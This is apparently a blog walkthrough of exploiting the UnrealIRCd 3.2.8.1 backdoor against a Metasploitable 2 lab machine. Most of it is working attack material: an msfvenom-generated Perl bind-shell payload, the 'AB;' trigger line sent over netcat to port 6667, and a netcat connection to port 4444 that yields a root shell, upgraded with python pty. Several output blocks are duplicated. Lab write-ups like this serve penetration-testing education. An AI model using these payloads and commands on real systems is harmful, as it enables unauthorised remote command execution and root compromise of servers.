UnrealIRCD 3.2.8.1 Backdoor Command Execution
July 02, 2016 —
metalkey
Attacker: Kali LinuxVictim: Metasploitable 2
Unreal IRCD 3.2.8.1 contains a backdoor that is triggered by entering AB; upon connecting. The backdoor was present in the Unreal3.2.8.1.tar.gz archive between November 2009 and June 12th 2010.
The following example demonstrates it’s use on Metasploitable 2 (192.168.1.142).
Generating the Payload
We’re going to generate a unix bind shell with msfvenom (port 4444) and connect to this with Netcat.
root@kali:~$ msfvenom -p cmd/unix/bind_perl --payload-options
root@kali:~$msfvenom -p cmd/unix/bind_perl LHOST=192.168.1.142
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 240 bytes
perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(){if($_=~ /(.*)/){system $1;}};'
root@kali:~$
No platform was selected, choosing Msf::Module::Platform::Unix from the payload
No Arch selected, selecting Arch: cmd from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 240 bytes
perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(){if($_=~ /(.*)/){system $1;}};'
Triggering the Exploit
root@kali:~$ nc -vn 192.168.1.142 6667
(UNKNOWN) [192.168.1.142] 6667 (ircd) open
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
AB;perl -MIO -e '$p=fork();exit,if$p;foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(LocalPort,4444,Reuse,1,Listen)->accept;$~->fdopen($c,w);STDIN->fdopen($c,r);while(){if($_=~ /(.*)/){system $1;}};'
:irc.Metasploitable.LAN 451 AB;perl :You have not registered
(UNKNOWN) [192.168.1.142] 6667 (ircd) open
:irc.Metasploitable.LAN NOTICE AUTH :*** Looking up your hostname...
:irc.Metasploitable.LAN NOTICE AUTH :*** Couldn't resolve your hostname; using your IP address instead
:irc.Metasploitable.LAN 451 AB;perl :You have not registered
Connecting to the Netcat Bind Shell
root@kali:~$ nc -vn 192.168.1.142 4444
(UNKNOWN) [192.168.1.142] 4444 (?) open
python -c "import pty;pty.spawn('/bin/bash')"
root@metasploitable:/etc/unreal#
(UNKNOWN) [192.168.1.142] 4444 (?) open
root@metasploitable:/etc/unreal#
Tags: backdoors